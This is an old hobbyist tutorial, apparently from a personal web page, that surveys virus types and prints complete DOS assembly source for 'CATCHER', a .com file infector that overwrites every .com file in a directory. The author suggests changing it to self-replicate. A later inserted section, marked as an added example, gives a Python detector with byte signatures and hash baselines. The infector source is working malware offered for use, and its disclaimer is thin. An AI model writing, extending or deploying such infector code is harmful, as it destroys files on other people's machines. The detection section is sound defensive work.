VIRUSES, A NEW DEFINITION
BROUGHT TO YOU BY PRABIN 
 
Author Prabin
Target Learn about Viruses
Public Release  March 5, 2003
Author Contact [email protected]
Website http://www.geocities.com/prabinpebam
Difficulty Level (1-7) 1
Tools Required Hiew 6.x

Warning:  This document is for Educational purposes only.
You know playing with viruses can get you in trouble so don't be stupid, use at your own risk!
 
 
Introduction

    Hi, sorry for the inactivity.  I have been hearing about viruses quite often and I feel like making one of my own, so far I am able to code a virus that can search a whole directory and infect any type of files that's in it.
 
Tutorial

    First of all, there are lots of different types of viruses.
    What the heck, I wanna make this tutorial longer so I put in the brief descriptions:



    Program viruses:
    This is just basically a virus that infects .exe or .com files.  It appends or overwrites the executable
    with its own virus code so that when executed, this file will start infecting other executable files.

    Stealth viruses:
    The name is kinda self-explanatory.  This type of virus tries to hide itself from virus scanners by
    hiding or changing directory sizes.

    Polymorphic viruses:
    Self-explanatory name also.  This kind uses special encryption methods to encrypt its own
    virus code and signature, making it very difficult for virus scanners to detect.

    Boot viruses:
    When a computer boots up, it scans the floppy disk and hard disk boot sectors and if it detects
    executable code, it executes it.  When you install an Operating System such as Micro$oft
    Windows, the setup writes code to the boot sector telling how the OS will start; in Windows'
    case, the boot sector executes files such as IO.SYS.

    Macro viruses:
    Macro viruses can only be opened with Micro$oft Office (Office97 or higher).
    In Microsoft Office, there is an embedded macro function that lets you use "Visual Basic" code and
    event handlers to create macros.  Macro viruses are malicious VB code, such as KILL filename and
    other code that can do malicious activities.


    Most viruses, excluding Macro viruses, are coded in assembly (sometimes Pascal).
    The reason is very simple: the author wants as much speed as possible and smaller
    code.  A simple executable compiled in C++ to display the message "Hello world!" can
    take up to 2 kilobytes, while assembly opcodes can display the same "Hello world!" string
    with a 20 byte .com file.  I will just keep it simple and start off with a simple file infecting
    virus.  Maybe next time when I feel like it, I will code a boot virus and write a tutorial on it.
    First here's the virus assembly code; the name of the virus is "CATCHER".
 
        ;CATCHER.ASM
        .MODEL TINY          ; code and data are in same segment

        .CODE

        ORG 100H             ; start code at 100h

        START:

        STARTOVER:
        MOV AH, 4EH          ; function 4Eh of int 21h is FIND FIRST FILE
        LEA DX, FILESPEC     ; *.com files
        XOR CX, CX           ; CX = 0
        INT 21H              ; interrupt 21h
        JMP INFECTFILE       ; goto INFECTFILE

        FINDNEXTFILE:
        XOR AX, AX           ; ax = 0
        MOV AH, 4FH          ; function 4Fh of int 21 is FIND NEXT FILE
        INT 21H              ; interrupt 21h
        JC VIRALMSG          ; no more files found

        INFECTFILE:
        MOV DX, 09EH         ; filename is stored in the DTA
        MOV AH, 3DH          ; function 3Dh of int 21h is OPEN FILE
        MOV AL, 01H          ; access mode = write only
        INT 21H              ; interrupt 21h
        JC ERROR
        XCHG AX, BX          ; swap ax with bx

        MOV AH, 40H          ; function 40h of int 21h is WRITE FILE
        MOV CX, (OFFSET VIRIICODEND - OFFSET VIRIICODE)  ; number of bytes to write
        MOV DX, 140H         ; offset of data to write from
        INT 21H              ; interrupt 21h
        JC ERROR
        JMP FINDNEXTFILE     ; loop

        VIRALMSG:
        MOV AH, 09H          ; function 9h of int 21h is PRINT STRING TO STANDARD OUTPUT
        MOV DX, OFFSET VIRMSG ; string to display 
        INT 21H               ; interrupt 21h
        JMP FINISH

        ERROR:
        ;...
        FINISH:
        INT 20H               ; Fuck out

        FILESPEC DB "*.COM",00

        VIRIICODE:

        MOV AH, 09H    ; PRINT STRING
        MOV DX, 10DH   ; offset of VIRMSG in new files
        INT 21H
        XOR AH, AH     ; AH = 0, Wait for Keypress
        INT 16H        ; Interrupt 16h
        INT 20H        ; fuck out again !

        VIRMSG   DB "If a body meet a body",13,10
                 DB "Coming thru the rye",13,10
                 DB "If a body kiss a body",13,10
                 DB "Need a body cry",13,10
                 DB "Every lassie has her laddie",13,10
                 DB "Nane they say have I",13,10
                 DB "Yet all the lads they smile on me",13,10
                 DB "When coming thru the rye$"

        VIRIICODEND LABEL NEAR

        END START
 

    The virus starts, finds the first .com file in the current directory, infects the file with the virus
    code that displays the POEM and then loops, finds the next .com file and infects it too.
    It continuously loops until the Carry Flag is set, which either means an error occurred or no more
    files of that kind are found.  When you run the infected .com files, those .com files will not infect
    other .com files because CATCHER only wrote the code to display the POEM.  You can change it
    so it infects the .com files with the whole virus code so the infected .com file will go on to infect
    other .com files when they are executed too.
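    Seen from the other side, the infection routine above leaves a very recognisable footprint: the target is
    opened write-only and written from file offset 0 without any seek, so the first bytes of every hit .com file
    become the payload stub (MOV AH,09H / MOV DX,010DH / INT 21H, which assemble to B4 09 BA 0D 01 CD 21
    whatever assembler is used) followed by the poem text.  The following Python scanner is an added example
    and is not part of the original tutorial: it flags .com files carrying that stub or the poem string, and it
    also keeps a SHA-256 baseline so that an overwrite of any .com file is caught even if the payload were
    changed.  The sample files it scans are constructed in a temporary directory; the function names and the
    CLEAN_COM bytes (MOV AX,4C00H / INT 21H, a program that just exits) are this example's own choices.

```python
from __future__ import annotations

import hashlib
import tempfile
from pathlib import Path

# First seven bytes of the payload CATCHER writes over each target.  Only the
# instructions with a single valid encoding are used (XOR AH,AH has two), so
# the signature holds for any assembler:
#   MOV AH,09H  -> B4 09
#   MOV DX,10DH -> BA 0D 01
#   INT 21H     -> CD 21
PAYLOAD_PREFIX = bytes.fromhex("B409BA0D01CD21")
# Start of the VIRMSG string that follows the stub in every infected file.
POEM_MARKER = b"If a body meet a body"


def scan_bytes(data: bytes) -> list[str]:
    """Return the list of CATCHER indicators found in one file image."""
    hits = []
    if data.startswith(PAYLOAD_PREFIX):
        hits.append("entry point overwritten with CATCHER payload stub")
    if POEM_MARKER in data:
        hits.append("CATCHER poem string present")
    return hits


def sha256_file(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def com_files(directory: Path) -> list[Path]:
    # DOS filenames are case-insensitive, so match .COM and .com alike.
    return sorted(p for p in directory.iterdir()
                  if p.is_file() and p.suffix.lower() == ".com")


def build_baseline(directory: Path) -> dict[str, str]:
    """Record a hash of every .com file while the directory is known clean."""
    return {p.name: sha256_file(p) for p in com_files(directory)}


def scan_directory(directory: Path, baseline: dict[str, str] | None = None) -> dict[str, list[str]]:
    """Scan every .com file; report signature hits and baseline deviations."""
    findings: dict[str, list[str]] = {}
    for path in com_files(directory):
        hits = scan_bytes(path.read_bytes())
        if baseline is not None:
            known = baseline.get(path.name)
            if known is None:
                hits.append("file not present in baseline")
            elif known != sha256_file(path):
                hits.append("hash changed since baseline")
        if hits:
            findings[path.name] = hits
    return findings


# Constructed sample images (not taken from any real file):
# a harmless program that only exits, and the payload as CATCHER lays it down.
CLEAN_COM = bytes.fromhex("B8004CCD21")           # MOV AX,4C00H ; INT 21H
INFECTED_IMAGE = (PAYLOAD_PREFIX
                  + bytes.fromhex("30E4CD16CD20")  # XOR AH,AH ; INT 16H ; INT 20H
                  + b"If a body meet a body\r\nComing thru the rye$")


def simulate_overwrite(original: bytes, payload: bytes) -> bytes:
    # The infector writes the payload at offset 0 without truncating, so any
    # original bytes beyond the payload length survive.
    return payload + original[len(payload):]


def demo() -> dict[str, list[str]]:
    """Baseline a clean directory, overwrite one file, and scan the result."""
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp)
        (d / "HELLO.COM").write_bytes(CLEAN_COM)
        (d / "TOOL.COM").write_bytes(CLEAN_COM)
        baseline = build_baseline(d)
        (d / "TOOL.COM").write_bytes(simulate_overwrite(CLEAN_COM, INFECTED_IMAGE))
        return scan_directory(d, baseline)


if __name__ == "__main__":
    for name, hits in demo().items():
        print(name, "->", "; ".join(hits))
```

    The signature check is quick but only catches this exact stub, while the baseline check catches any
    overwrite of a .com file at the cost of having to refresh the baseline whenever a file legitimately
    changes; in practice the two are used together.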

    To get help on all the interrupts, get Ralf Brown's Interrupt List!
    That's the best and most complete list of interrupt functions available.

 
 
Final Thoughts

    This page is meant for educational purposes only. Now that you have gone through this page, you must have learned a little more about viruses. Before playing with your viruses, consider the consequences.

For further information write to [email protected]
Property of http://www.geocities.com/prabinpebam

 
 
The end.